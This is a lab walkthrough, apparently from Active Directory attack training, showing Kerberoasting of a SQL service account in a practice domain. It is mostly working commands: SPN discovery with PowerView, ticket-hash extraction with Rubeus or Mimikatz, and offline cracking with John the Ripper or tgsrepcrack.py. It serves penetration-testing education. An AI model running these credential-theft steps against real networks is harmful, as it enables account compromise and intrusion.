Obj 14 Kerberoast Pass Crack

Task - Using the Kerberoast attack, crack password of a SQL server service account.

We first need to find out services running with user accounts as the services running with machine accounts have difficult passwords. We can use PowerView’s (Get-DomainUser –SPN) or ActiveDirectory module for discovering such services:

Get Domain User SPN

PS C:\AD\Tools> Get-DomainUser -SPN

Output:
samaccountname : svcadmin

serviceprincipalname : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, 
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}

This shows us that svcadmin has a SPN that we can kerberoast

Use Rubeus and John the Ripper to get the hash and crack it

C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple 
/rc4opsec /outfile:C:\AD\Tools\hashes.txt

We can now use the file hashes.txt we just created with John the Ripper

We need to change this in the hashes.txt file first!

moneycorp.local:1433*

needs to be

moneycorp.local*

C:\AD\Tools>C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --
wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

- OPTION 2 -

KerberosRequestorSecurityToken.NET class from PowerShell, Mimikatz and tgsrepcrack.py

Use the KerberosRequestorSecurityToken.NET class from PowerShell to request a TGS

PS C:\AD\Tools> Add-Type -AssemblyNAme System.IdentityModel
PS C:\AD\Tools> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 
"MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Check to see if we have the TGS for the service now

klist

Let's dump the tickets to disk

PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Invoke-Mimikatz -Command '"kerberos::list /export"'

Now we have a kirbi file we crack with tgsrepcrack.py

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 
.\2-60a10000-studentx@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.localDOLLARCORP.MONEYCORP.LOCAL.kirbi